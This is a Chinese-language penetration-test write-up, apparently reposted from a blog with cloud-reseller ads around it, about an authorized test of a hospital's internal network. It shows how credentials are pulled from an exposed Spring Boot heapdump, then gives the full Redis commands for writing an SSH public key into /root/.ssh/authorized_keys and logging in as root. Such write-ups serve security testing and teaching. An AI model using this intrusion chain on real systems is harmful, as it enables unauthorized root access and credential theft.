某医院的实战渗透测试(组合拳)_nacos 渗透测试

阿里云国内75折 回扣 微信号:monov8
阿里云国际,腾讯云国际,低至75折。AWS 93折 免费开户实名账号 代冲值 优惠多多 微信号:monov8 飞机:@monov6

一、前言

项目是内网环境下进行所以通过vpn接入内网之后进行目标系统的测试。信息泄露+redis写公钥

二、Spring信息泄露

访问客户给的目标地址通过代理把流量转给了BurpSuite,然后插件就爆了一个spring的信息泄露。

spring信息泄露有很多路径但是evn这种路径的密码基本上是加密的会用星号进行脱敏解密可以看这下面师傅写的文章我没复现因为我菜只会玩heapdump。

https://blog.51cto.com/u_12632800/4998813

https://www.hacking8.com/bug-product/Spring-Boot/Spring-Boot-%E8%8E%B7%E5%8F%96%E8%A2%AB%E6%98%9F%E5%8F%B7%E8%84%B1%E6%95%8F%E7%9A%84%E5%AF%86%E7%A0%81%E7%9A%84%E6%98%8E%E6%96%87.html

发现存在heapdump路径访问/web/actuator/heapdump进行下载。

heapdump也叫堆转储文件是java进程在某个时间点的内存快照里面可能会包含数据库账号密码、shiro的key、阿里云的key等。

下载下来的heapdump文件可以使用工具进行内容检索下面为几个常用的heapdump查看工具。

https://github.com/wyzxxz/heapdump_tool比较常用

https://github.com/whwlsfb/JDumpSpider用法简单

https://docs.oracle.com/javase/6/docs/technotes/tools/share/jvisualvm.html这个是jdk自带的工具供开发者用于监视故障排除。

使用方法可以查看该师傅的博客https://blog.csdn.net/gw5205566/article/details/105666637

输入password则可以查看携带password的字段。

在里面找到数据库root的密码同时还有redis、nacos、tomcat的密码。没有找到shiro的key不然运气好的话还能来个RCE。

第二个工具比较方便是因为一条命令他就会把有用的信息输出出来。

在这里插入图片描述
在这里插入图片描述

看起来比较舒服。

三、Redis写公钥

因为redis不出网纯内网环境同时我们是vpn接入不是在现场路由的问题没办法反弹shell所以用redis写公钥来进行下一步攻击。

1、 ssh-keygen -t rsa //执行生成key命令

2、(echo -e “\n\n”; cat id_rsa.pub; echo -e “\n\n”) > key.txt //将公钥写入txt

在这里插入图片描述

3、cat /root/.ssh/key.txt | redis-cli -h 172.16.198.244 -a redis -x set xxx //将.ssh目录下的公钥文件1.txt 通过redis-cli客户端写入到目标主机缓冲中,-a是因为redis存在密码而不是未授权。

在这里插入图片描述

4、连接redis进行

redis-cli -h 172.16.198.244 -p 6379 -a redis //使用客户端登录目标

config set dir /root/.ssh //设置存储公钥路径redis的备份路径

config get dir //查看是否设置成功

config set dbfilename "authorized_keys" //设置文件名称

save //保存

在这里插入图片描述

5、 ssh -i id_rsa root@172.16.198.244 //进行ssh连接即可

在这里插入图片描述

ps也可以把id_rsa转换为PEM格式。

在这里插入图片描述

然后把生成的id_rsa文件导入到finalshell用户名是root即可连接。

在这里插入图片描述

在这里插入图片描述

导入成功之后使用该密钥就可以连接。

在这里插入图片描述

四、文章来源

文章作者知识星球《网络安全情报攻防站-PowerShell_1》
文章链接https://t.zsxq.com/09deFts5r

阿里云国内75折 回扣 微信号:monov8
阿里云国际,腾讯云国际,低至75折。AWS 93折 免费开户实名账号 代冲值 优惠多多 微信号:monov8 飞机:@monov6